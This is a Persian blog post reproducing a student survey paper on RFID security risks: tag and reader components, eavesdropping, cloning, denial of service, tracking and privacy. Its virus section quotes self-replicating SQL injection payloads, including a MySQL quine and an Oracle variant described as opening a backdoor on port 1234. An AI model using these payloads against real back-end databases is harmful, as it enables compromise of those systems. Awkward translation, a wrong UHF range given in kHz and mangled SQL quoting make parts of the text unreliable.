فناوریهای شناسایی و ردیابی

بارکد ، RFID ، شناسایی با امواج رادیویی ، ردیابی ، ردگیری، ردیابی ماهواره ای ، GPS ، بینایی ماشین ، بیومتریک ، کارت هوشمند، سنسور

فناوریهای شناسایی و ردیابی

بارکد ، RFID ، شناسایی با امواج رادیویی ، ردیابی ، ردگیری، ردیابی ماهواره ای ، GPS ، بینایی ماشین ، بیومتریک ، کارت هوشمند، سنسور

مقاله ریسک های امنیتی سیستم های RFID

ریسک های امنیتی سیستم های RFID

 

مجید جان نثاری لادانی (1) ، حسین صفری(2) ، علی عظیمی (3)

 

 

1- دانشجوی کارشناسی ارشد مهندسی فنآوری اطلاعات دانشگاه شیراز

2- کاندیدای دکترای مهندسی صنایع دانشگاه تهران

3- دانشجوی کارشناسی ارشد مهندسی فنـآوری اطلاعات دانشگاه شیراز

 

واژه­های کلیدی

RFID : سیستم شناسایی با امواج رادیوئی ، Security  امنیت

 

 چکیده :

RFID یک تکنولوژی بی سیم است که داده های دور افتاده را از دستگاهها بازیابی و ذخیره می کند . سیستم از تکنولوژی RFID که شامل برچسب (علامت) و غلط گیر در جلو و کاربرد و برنامه هایی که در عقب هستند استفاده می کند. این تکنولوژی اجازه می دهد که اطلاعات حساس برای خواندن و نوشتن برچسب ها و علائم محدودی در یک مسافت همزمانی بررسی شود. تکنولوژی RFID دارای قابلیت انعطاف پذیری و حمل می باشد و همچنین اطلاعاتی که در برچسب ها مستقرند نیازها را برای امنیت و کنترل های خلوت و پنهانی توسعه می دهند. اجزای سیستم های RFID   شامل  تگ  ،  قرائت کننده  ، آنتن ، ایستگاه می باشد که هر کدام در نوع خود دارای مشکلات امنیتی می باشند که ما در این مقاله مشکلات امنیتی را در بخش های زیر بررسی نموده ام :

خواندن تگ های غیر مجاز  ، استراق سمع ، ردیابی  ، تصادف تگ ها ، ویروس و کرم ها که راه حل هایی را برای رفع این مشکلات ارائه شده است .  

اهــداف :

ارزیابی امنیتی سیستم RFID به برآورده شدن این اهداف کمک خواهد کرد :

شناخت نیاز تجاری شما به امنیت در RFID که شامل جعل ، جلوگیری از دزدی ، روابط عمومی ، بدهی و سایر خطرات ناشی از اشکال ناکافی امنیتی که ممکن است به آنها پرداخته نشود ، می باشد .

تحلیل نقاط ضعف بالقوه که می تواند اطلاعات حساس را در معرض خطر ارائه بدون اجازه ، تکثیر ، تحریف یا گم شدن قرار دهد و بررسی این که چگونه امنیت سیستم از طریق حق انحصاری Pending امنیت RSA ، تکنولوژی ضد جعل ، متخصصان نوشته های رمزی و تحقیق در زمینه امکان کاربرد های دولتی ، اصلاح می شود ، این در حالی است که تعادل میان کل سیستم امنیت ، هزینه و اجرا باید حفظ شود .

این خدمات دهی ایده آل است برای :

 فروشنده های نیم رساناها که مقدار زیادی از قطعات بدون سیم را با اشکال امنیتی به ویژه در RFID ، بازار های وسایل خودکار و Sensing ارائه می کنند . این قطعات از استاندارد RFID یا سایر پروتکل های بدون سیم تجاری استفاده می کنند .

 فروشنده های برچسب RFID یا ادغام کننده های پردازندة فرآورده های داروئی ، وسیله دفاع ، دستمزد ها یا سایر فرصت های با ارزش افزودن .

 مجریان افزایش امنیتی و ransponder ها به ویژه در دارو سازی ، دستمزد ها ، کارخانه و اتوماتیک کردن ساختمان و فعالیت های سامان دهی دفاعی .

 کاربرد های دولتی شامل امنیت کشور ، هویت ، فوائد انتقال ، وسیله نقلیه و افزایش امکانات حمل و نقل ، سامان دهی ها برای بازیافت مصیبت ها و دستمزد ها .

کاربرد نادرست سطح پائین و بطور نابجای داده ها در تگ ها به عوامل بستگی دارد

  

اجزای سیستم های RFID

(TAG ) 1- تگ

تگ شامل یک میکروچیپ وصل شده به یک آنتن می باشد و فراخور  نیاز و کاربرد در شکل ها و سایزهای مختلفی برای فرکانس های مشخص و محدوده کاری معین طراحی می گردد .

به طور کلی سه نوع tag  RFID وجود دارد که عبارتند از:

·  tag های Passive: این نوع tag ها هیچ منبع تولید انرژی درونی ندارند و انرژی خود را از طریق سیگنال­های RF که توسط دستگاه Reader ارسال و توسط آنتن موجود در tag دریافت می­شود، تامین می­کنند.

·  tag های Semi-passive: بسیار شبیه tag های Passive است ؛ با این تفاوت که باتری کوچکی در آن­ها وجود دارد و انرژی لازم برای فعال شدن مدار داخل آن­ها را فراهم می­سازد.

·  tag های Active : این tag ها دارای یک منبع انرژی داخلی می­باشند که توانایی انتقال اطلاعات در فواصل دورتر را فراهم می­کند

این سه نوع tag از جهات دیگری چون سایز، دامنه پاسخ­گویی، سرعت پاسخ­گویی و...  نیز با هم تفاوت هایی دارند .

2- قرائت کننده (Reader)

این جزء معمولا به یک سیستم کامپیوتری متصل است و مانند اسکنر بارکد عمل می کند .

در بعضی انواع آن باطری تعبیه شده که بتوان از آن صورت موبایل برای عملیات خواندن تگ ها استفاده نمود .

قرائت کننده ارتباط بین سیستم اطلاعاتی و تگ ها را برقرار می کند .

3- آنتن :

آنتن به قرائت کننده متصل است و در سایزها و ساختار مختلف بر اساس فاصله ارتباط و بهره وری مورد نظر طراحی می گردد .

آنتن تگ را فعال کرده و اطلاعات آنرا با انتشار پالس های رادیوئی انتقال می دهد .

RFID در سه محدوده فرکانس مختلف کار می­کند :

·        فرکانس پایین(LF): Low Frequency ←یعنی فرکانس بین 120 تا 134 کیلو هرتز

·        فرکانس بالا(HF): High Frequency ← یعنی فرکانس 13.56 مگاهرتز

·  فرکانس بسیار بالا(UHF): Ultra High Frequency ← یعنی فرکانس بین 902 تا 915 کیلو هرتز

 4- ایستگاه

مجموعه آنتن و قرائت کننده را ایستگاه می نامند . ایستگاه می تواند اطلاعات ذخیره شده در تگ را بخواند و آن را با اطلاعات جدید به روز نماید .

برای این سیستم نرم افزاری بسته به کاربرد خاص مورد نظر قابل طراحی است .

مشکلات امنیتی  این سیستم به چند بخش تقسیم می شود : 1

·        خواندن تگ های غیر مجاز

·        استراق سمع

·        ردیابی

·        تصادف تگ ها

·        ویروس و کرم ها

خوانندگان مجاز و تگ های قانونی

عبارت مجاز در رابطه با خوانندگان یا درخواست کننده هایی بکار میرود که در بانک اطلاعاتی سیستم RFID ثبت شده اند و مکانیزم امنیتی خاصی برای آنها در نظر گرفته شده است تا بتوانند به منابع سیستم دسترسی پیدا کنند. عبارت قانونی به تگهایی اطلاق می شود که در بانک داده های سیستم RFID ثبت شده اند. اگر خواننده ای مجاز نباشد به آن خواننده غیر مجاز اطلاق می شود ولی تگی که قانونی نباشد به عنوان تگ متقلب شناخته می شود. اگر تگی برای مصارف دیگری کپی شود به تگ کپی شده همنوع اطلاق می شود.

 

1-security in ubiquitous computing (Melanie Rieback FIRST 20 June, 2007)

چگونگی رفع مشکلات امنیتی

مدل سیستم

در حالیکه سیستم RFID از اجزای مختلفی تشکیل شده است، یک مدل از این سیستم می تواند تنها از درخواست کننده ها ، تگ ها ،  و کانالهای ارتباطی بین آنها تشکیل شود ، البته تا وقتی که اجزای سیستم با محدودیتی مواجه نشوند که لازم باشد رمزهای خاصی برای امنیت سیستم بکار گرفته شود. از اینرو می توان درخواست کننده و باقی سیستم پس زمینه ساز را به عنوان یک هویت مستقل در نظر گرفت که به عنوان یک درخواست کننده مجاز شناخته می شوند. حال این امکان وجود دارد که اجزای ارتباطی را نشان دهیم، درخواست کننده های مجاز، تگ های قانونی، تگ های متقلب، تگ های همنوع و درخواست کننده های غیر مجاز. شکل زیر راههای ممکن برای ارتباط بین اجزا را نشان میدهد . 2

2-  Confronting Security and Privacy Threats in Modern RFID Systems

School of Electrical and Electronic Engineering, The University of Adelaide

Auto-ID Lab, Adelaide SA 5005, Australia, damith@eleceng.adelaide.edu.au

cole@eleceng.adelaide.edu.au

 

یک مدل ارتباطی که کانالهای اطلاعاتی مختلفی را شرح میدهد در شکل بعدی  نشان داده شده است. منابع اطلاعاتی در یک سیستم RFID ارزان قیمت در دسترس تجاوزگران قرار دارد که می تواند باعث ناامنی کانالهای اطلاعاتی شود. محتویات حافظه تگ به همراه مسیر کانال حافظه، تحلیل قدرتی کانال قدرت، و کانالهای جلویی و کانالهای عقبی در شکل بالا نشان داده شده اند.

حمله کننده ممکن است از کانالهای جلویی یا عقبی اطلاعاتی را بخواند یا بر روی آنها بنویسد که این بستگی به فرکانس عملکرد و طبیعت مهاجم مدل شده دارد.کانال فیزیکی فقط درهنگام تخریب  فرایند استخراج محتویات حافظه خوانده می شود. البته مهاجم این امکان را دارد که از تگ مورد نظر کپی تهیه کند ولی تهیه چندین کپی در کاربردهای زنجیره تغذیه  غیر ممکن است. با این حال ، برای یک کاربرد عمومی نظیر سیستم کنترل دسترسی ، چنین فرضی درست نیست.

در نظر گرفتن فواصل ممکن در حالتی که شخص سومی بتواند به مبادله بین تگ و درخواست کننده دست پیدا کند، این ایده را میدهد که رفتار مهاجمین را دسته بندی کنیم که در شکل بالا نشان داده شده است. 3

·        رمز گذاری اطلاعات

اطلاعات، متشکل از یک ها و صفرهایی است که بین تگ ها و خواننده باید در یک حالت معتبر فرستاده شود  دو گام قاطع در ارتباط معتبر وجود دارد نوشتن اطلاعات و انتقال رمز گذاری شده و این تحریر سیگنال ارتباطات می باشد ترکیب رمز گذاری ، وسعت نوار، درستی و اتلاف نیروی تگ ها را تعیین میکند .

یکی دیگر از عامل محدود کننده وسعت نوار اشغال شده توسط سیگنال می باشد خواننده قادر به انتقال در بالاترین نیرو می باشد اما توسط نوارهای ارتباطی باریک بوسیله تنظیمات ارتباطاتی محدود می شود. بنابراین رمز گذاری استفاده شده از خواننده به تگ معمولاً برای اشغال یک وسعت نوار پایین موردنیاز است . اگر چه تگ های غیر فعال بصورت فعالانه سیگنال را منتقل نمی کنند . از اینرو رمزگذاری استفاده شده برای تگ  به خواننده ارتباط می تواند یک وسعت نوار بالا را اشغال کند.

دو مقوله عریض برای رمزهای استفاده شده در RFID وجود دارد سطح رمزها و انتقال رمزها سطح رمزها خرده یا سطح ولتاژشان را نشان می دهد .

·        بر چسب ضد – تصادف

وقتی بر تگ های چند گانه به طور همزمان مسئول سیگنال خواننده هستند. سیگنال های ارتباطی شان می تواند با یکی دیگر تداخل کند . این دخالت اشاره میکند به تصادف و نتیجه هایی که انتقال غیر موفق است . برای خواندن در ارتباط با تگ های چند گانه یک روش  تصادف باید بکار گرفته شود اگر یک تقاضا بطور نمونه بیشتر از یک تگ ارتباطی با یک خواننده در زمان مشابه داشته باشد تصادف تگ صورت می پذیرد . 4

·        روش های ضد – تصادف یا الگوریتم ها در تگ

3-RFID Systems and Security and Privacy Implications (Massachusetts Institute of Technology Cambridge, MA 02139 www.autoidcenter.org)

cole@eleceng.adelaide.edu.au

 

 

 بیشتر الگوریتم ضد – تصادف مربوط به شبکه می باشد . بر خلاف شبکه استاندارد و تگ های RFID تعداد از مشکلاتی که رخ می دهد از منابع محدود  ، که آنها فراهم می کنند با آن را مطرح می کند بوجود می آید .

اولاً آنها تنها نیروی حساب محدودی را ارائه می دهند . ثانیا اطلاعات ، مانند بخشی از تگ های  شناساننده که خوانده شده اند شاید غیر قابل اعتبار باشند . ثالثا تشخیص  تصادفات ممکن است به واسطه سیگنال متفاوت توسعه یافته از تگ ها مشکل باشد  . نهایتاً در بیشتر شبکه های بدون سیم فرستنده قادر نخواهد بود تا استراق سمع فردی دیگر را تصور نماید . 4

دلایل بازتابنده

امنیت محتوای لیبل ها در دراز مدت قابل تضمین نیست زیرا آنها در برابر حملات فیزیکی آسیب پذیر هستند. از اینرو لیبل ها نمی توانند برای مدت زیادی اطلاعات امنیتی مهم نظیر رمزهای عبور را در خود نگه دارند، ولی نگهداری اطلاعات مربوط به تگ دیگری که ربطی به تگ حاضر ندارد تحت شرایطی مجاز است و آن هم اینکه دسترسی به اطلاعات باعث به خطر  افتادن امنیت تگ دیگری نشود . 5

استراق سمع

 بطور کلی دو نوع استراق سمع در سیستم های RFID ارزان قیمت وجود دارد: استراق سمع پسیو و اسکن کردن( استراق سمع اکتیو).

استراق سمع پسیو: این شکل به مشاهده یا ضبط ارتباط بین یک تگ و خواننده با یک گیرنده پیش بینی نشده مربوط می شود. این نوع ممکن است توسط شخص سومی که در محدوده عملکردی قرار دارد ، حال چه کانالهای جلویی و چه کانالهای عقبی ، انجام شود.

اسکن کردن( استراق سمع اکتیو): در این حالت یک مهاجم سعی دارد بدون داشتن مجوز اطلاعات مبادله شده را بخواند. وقتی چنین حالتی در سیستم RFID ارزان قیمت روی میدهد، مهاجم با استفاده از یک خواننده خارج از برنامه به نیرومندکردن تگ می پردازد. در این حالت مهاجم در محدوده نشان داده شده در شکل 5 فعالیت می کند.

مجموعه داده ذخیره شده بر روی یک تگ مجاز ،یکتا و از تگ های دیگر مستقل خواهد بود. این موضوع به این معنی است که یک مجموعه کامل از محتویات تگ ها یکتاست( مانند کلیدهای امنیتی، شناسه های تگ یکتا و رمزها ).

نقاط آسیب پذیر سیستم های RFID ارزان قیمت

4.5-  Confronting Security and Privacy Threats in Modern RFID Systems

School of Electrical and Electronic Engineering, The University of Adelaide

Auto-ID Lab, Adelaide SA 5005, Australia, damith@eleceng.adelaide.edu.au

cole@eleceng.adelaide.edu.au

 

 

با استفاده از مدل امنیتی که در بخشهای قبلی شرح داده شد، روشن است که سیستم های RFID ارزان قیمت ریسکهای امنیتی قابل توجهی را به همراه دارند، بخصوص که بخاطر هزینه پایین ، کانالهای ارتباطی نامطمئنی در نظر گرفته شده اند و ارتباط بین تگ ها و خواننده از امنیت کافی برخوردار نیست. ریسکهای امنیتی که در نتیجه این سیستم بوجود می آید به شرح زیر است :

Cloning

ابزارهایی که برای جعل هویت تگ ها یا خوانندگان طراحی شده اند( رفتار یک لیبل یا خواننده واقعی  را تقلید می کند). نتیجه مستقیم Cloning ایجاد امکان برای تولید تگی با لیبل RFID می باشد که مشخصه های یک تگ مجاز را می تواند داشته باشد.

تگهای کلاس 1 EPC مکانیزمی برای جلوگیری از Cloning ندارند، زیرا تگ ها دارای یک بیت ساده ذخیره برای انتقال اطلاعات می باشد و در صورت درخواست هر خواننده ای رشته ای از بیت ها را انتقال میدهد. با وجود اینکه قابلیت این را دارد که جستجو و تطبیق تگ های مجاز را از غیر مجاز تشخیص دهد ولی نمی توان بین تگ های کپی شده و اصل آنها تفاوتی را قائل شد. 6

Man-in-the-Middle

یک سیستم RFID بویژه تحت حملات انسان مدار  می باشد که نتیجه آن استراق سمع مسیر انتقال اطلاعات بین خواننده و تگ می باشد.

Denial of Service

یک مهاجم ممکن است از این روش برای متوقف کردن یا حمله به سیستم امنیتی استفاده کند. برای مثال ، این نوع حمله به آسانی با قرار دادن تعداد زیادی از لیبل های طولی برای شناسایی یک خواننده انجام می پذیرد. علاوه بر این ممکن است از خوانده شدن یک تگ بوسیله ایجاد پارازیت یا غیره جلوگیری شود، بعنوان مثال با ایجاد نویز در باند فرکانسی مورد استفاده برای کاربردهای حساس ، ممکن است اثرات مخربی را به همراه داشته باشد.

ضعف لایه ارتباطی

یکی از آسیب های تگ های ارزان قیمت  حملات با استفاده از تحلیل قدرت است که نگهداری اطلاعات را بصورت طولانی مدت در تگ ها ناممکن می سازد.

با وجود اینکه این نوع حمله ممکن است با بکارگیری یک تگ با قیمت بالاتر جبران شود، ولی این حقیقت که تگ RFID حداقل دو رمز یکتادارد ، پتانسیل ضد امنیتی را برای سیستم ایجاد می کند و نشان میدهد که راه حلی برای مدیریت رمز ها در نظر گرفته نشده است. می توان متصور شد که در آینده لیستی از رمزهای تخریب در یکی از سایتهای عمومی انتشار پیدا کند.

6-  Confronting Security and Privacy Threats in Modern RFID Systems

School of Electrical and Electronic Engineering, The University of Adelaide

Auto-ID Lab, Adelaide SA 5005, Australia, damith@eleceng.adelaide.edu.au

cole@eleceng.adelaide.edu.au

 

 

 

حملات فیزیکی

بعلاوه خود لیبل ها با نبود موانع دسترسی با توجه به هزینه های پایین در معرض حمله فیزیکی قرار دارند. امکان حملات فیزیکی در سیستم برای ایجاد امکان حمایت از لیبل ها در نظر گرفته نشده است. با این حال قابلیت دسترسی به اطلاعات سودمند از یک لیبل محافظت شده ، مشکل بزرگی است. یک امکان در مورد احتمال حمله فیزیکی ، کم شدن پرسنل نگهبان در محل نگهداری کارتهای هوشمند می باشد.

تعداد زیادی از حملات فیزیکی در دو نوع انجام میشوند، حملات غیر هجومی( تحلیل زمانی، قدرتی، نقاط ضعف عملکردی، فرکانس های کاری ، و تحلیل مسیر انتقال اطلاعات) و حملات هجومی( استفاده از  microprobing، استفاده از مسیر انتقال اطلاعات برای استخراج داده ها با استفاده از میکروسکوپ لیزری)

تخلفات پنهانی : برش عمودی

سناریوهای مختلفی را می توان از این مسئله در جاهای مختلف مشاهده کرد مانند کارت های اعتباری، یا ابزارهای بلوتوث. با این حال RFID با توجه به سیاست کم کردن هزینه اش ، شناسه های یکتایی دارد که هرکس می تواند آنها را بخواند. رمز گشایی اطلاعات محصول با توجه به طرح عددگذاری یکتا امکان ایجاد دو سناریو را فراهم کرده است. برش عمودی، و پیگیری و مراقبت، در جاهائیکه اطلاعات محرمانه مردم نیز همانند شرکتها ممکن است مورد حمله قرار گیرد.

ممکن است شخصی تعدادی از لیبل ها را بعنوان شخص سوم دریافت کند . برای مثال، افرادی که اطلاعات دینی را حمل می کنند یا کسانی که اطلاعاتی راجع به ایده های سیاسی دارند ، از دست دادن این اطلاعات و لو رفتن آنها ممکن است به وسیله ای برای شکنجه ، اخاذی یا آزار آنها تبدیل شود.

پیگیری و مراقبت

یک نگرانی دیگر در این زمینه مربوط می شود به ترکیب اطلاعات شناسایی انسانی برای شناسایی اطلاعات دیگر و لیبل های اسکن شده RFID می باشد که مراقبت از این موضوع بسیار مشکل می باشد. اطلاعاتی که بین دو منبع انتقال داده می شود ، در صورت دزدیده شدن ممکن است فجایع امنیتی ، اقتصادی یا سیاسی را به همراه داشته باشد. در صورت استفاده از چنین طرحی افراد ممکن است از طریق پاسخهای لیبل مورد انتظار پیگیری شوند . از اینرو ممکن است موقعیت ، حرکتها یا شناسه فرد لو برود .

آدرس دهی موضوعات امنیتی

تگ های RFID نمی توانند از بار محاسباتی سیستم های معمولی که با منابع محاسباتی مشخصی در دوسر ارتباطی حمایت می شوند پشتیبانی کند. در این زمینه نیاز است که راه حل هایی اندیشیده شود. یکی از بیشترین اشکالاتی که در سیستم های امنیتی ایجاد می شود ناشی از امن نبودن کانالهای ارتباطی است . بنابراین لازم است که تگ ها و خوانندگان در برابر حملات استراق سمع ایمن شوند. لیبل های کلاس 2 این نیاز را تا حدودی برآورده می کنند ولی مشکلات هزینه نیز در این زمینه وجود دارد.

عبارت قابلیت اعتماد می تواند برای تشریح مکانیزم حفاظت اطلاعات برای افراد مجاز، اطلاق شود. اطلاعات مبادله شده بین تگ و خواننده باید محرمانه باشد و نباید بوسیله استراق سمع لو رود،  مخصوصا وقتی که حاوی اطلاعاتی نظیر کدهای رمز  یا اطلاعاتی اینگونه می باشد. در حال حاضر چنین سیستم ایمنی وجود ندارد و به این مسئله باز بر میگردد به موضوع کم شدن هزینه ها در تکنولوژی RFID ارزان قیمت.

این حقیقت که تگ ها و خوانندگان هیچ روشی برای اثبات حقانیت خود ندارند باعث روبرو شدن با مشکلات Cloning شده است. برای حل این مشکل باید سیستمی امنیتی بوجود بیاید تا امکان اثبات درست و اصل بودن را بوجود بیاورد. هدف سیستم شناسایی در RFID جلوگیری از شبیه سازی تگهای مجاز ( و تبعا شناسایی موضوع همراه تگ) توسط یک حمله دقیق می باشد. با سیستم شناسایی کپی کردن تگ های مجاز و سوء استفاده از آنها ناممکن  می شود.

کاربرد نادرست سطح پائین و بطور نابجای داده ها در تگ ها به عوامل بستگی دارد : 7

·        سرریز شدن بافر

·        کرم های کامپیوتری

·        ویروس های Rfid

کرم کامپیوتری Rfid چیست ؟

کرم های Rfid از دو طریق شبکه و تگ ها تکثیر یا منتشر می گردد .

اغلب دارای حداکثر کارایی (تعدیل و پنهان سازی) می باشد .

 

 

7-security in ubiquitous computing (Melanie Rieback FIRST 20 June, 2007)

 

 

 

ویروس های Rfid :

ویروس ها بیشتر در مبحث مربوط به بخش پایگاه داده در سیستم های Rfid می باشد . که در این مقاله به SQL Injection پرداخته می شود .

SQL Injection attack

OldContents=Raspberries;UPDATE ContainerContents SET

NewContents = NewContents || ``;[SQL Injection]'';

Filling in the SQL injection part:

[SQL Injection] = UPDATE ContainerContents SET NewContents =

NewContents || ``;[SQL Injection]'';

Self-replication

• ‘Get Current Query’ function:

SELECT SQL_TEXT FROM v$sql WHERE INSTR(SQL_TEXT,'`')>0;

• A complete virus (Oracle SQL*Plus):

Contents=Raspberries;

UPDATE ContainerContents SET NewContents= NewContents || ';' ||

CHR(10) || (SELECT SQL_TEXT FROM v$sql WHERE

INSTR(SQL_TEXT,'`')>0);

 

Example Virus: (Oracle/SSI)

 

• Here, SQL injection targets an INSERT query:

Apples',NewContents=(select SUBSTR(SQL_TEXT,43,127) FROM

v$sql WHERE INSTR(SQL_TEXT,'')>0)--

• Payload uses a server-side include to open a backdoor on

port 1234 of the web management platform

• Virus fits on a 1 kbit RFID tag (127 characters)

 

Self-replication with Quines:

• Quine = A program that prints its own source code:

char*f="char*f=%c%s%c;main()

{printf(f,34,f,34,10);}%c";

main(){printf(f,34,f,34,10);}

• The classic example (in C):

• Introns = Quine data not used to output quine code

Example Quine Virus: (mySQL)

• This SQL injection virus is a quine:

';SET@a='UPDATE ContainerContents SET NewContents=

concat(\'\\\';SET@a=\',QUOTE(@a),\';\',@a);--

• Virus fits on a 2kbit RFID tag (233 characters)

-security in ubiquitous computing (Melanie Rieback FIRST 20 June, 2007)

نتیجه گیری :

ما دراین تحقیق ابتدا به معرفی RFID پرداختیم و سپس اجزای آن را که به چند جزء مختلف تقسیم می شد شرح دادیم . این اجزا هر کدام به در نوع دارای مشکلات امنیتی بودند که ما برای رفع این مشکلات راه حل هایی را ارائه دادیم .

از مشکلاتی که میتوانیم در اینجا بازگو نمائیم  (خواندن تگ های غیر مجاز ، استراق سمع ، ردیابی ، تصادف تگ ها ، ویروس ها و کرم ها ) بود که ما با راه حل های ارائه شده می توانیم یک سیستم RFID مطمئن را پیاده سازی نمائیم . با این  وجود همه روزه حملات جدیدی به این سیستم ها صورت می پذیرد که برای جلوگیری از آنها میبایست آنها را پیش بینی نموده و در جهت رفع آنها اقدام گردد .

 

منابع و مأخذ

1-security in ubiquitous computing (Melanie Rieback FIRST 20 June, 2007)

2-RFID Systems and Security and Privacy Implications (Massachusetts Institute of Technology Cambridge, MA 02139 www.autoidcenter.org)

3-  Confronting Security and Privacy Threats in Modern RFID Systems

School of Electrical and Electronic Engineering, The University of Adelaide

Auto-ID Lab, Adelaide SA 5005, Australia, damith@eleceng.adelaide.edu.au

cole@eleceng.adelaide.edu.au

4- DEPARTMENT OF HOMELAND SECURITY Office of Inspector General

Office of Information Technology July 2006

5- K. Finkenzeller, RFID Handbook: Radio Frequency

Identification Fundamentals and Applications. John

Wiley & Sons, New York, 1999.

6- EPCglobal Inc. home page,

http://www.epcglobalinc.org.

7- EPCglobal Inc., Specification for RFID air interface,

http://www.epcglobalinc.org/standards_technology/E

PCglobal2UHFRFIDProtocolV109122005

8- M. Abadi, M. Burrows, C. Kaufman, and B. W. Lampson. Authentication and

delegation with smart-cards, In Theoretical Aspects of Computer Software, pages

326-345, 1991.

9- R. Anderson and M. Kuhn. Low cost attacks on tamper resistant devices. In IWSP:

International Workshop on Security Protocols, LNCS, 1997.

10- World Wide Web Consortium. http://www.w3c.org/SOAP/

11-  World Wide Web Consortium. http://www.w3c.org/XML/

نظرات 1 + ارسال نظر
[ بدون نام ] دوشنبه 14 دی 1388 ساعت 11:01

من به اصل این مقاله نیاز دارم لطفا در صورت امکان برایم mail نمایید.

با سلام
اصل مقاله در سایت آمده است و بخشی از آن حذف نشده است!

برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد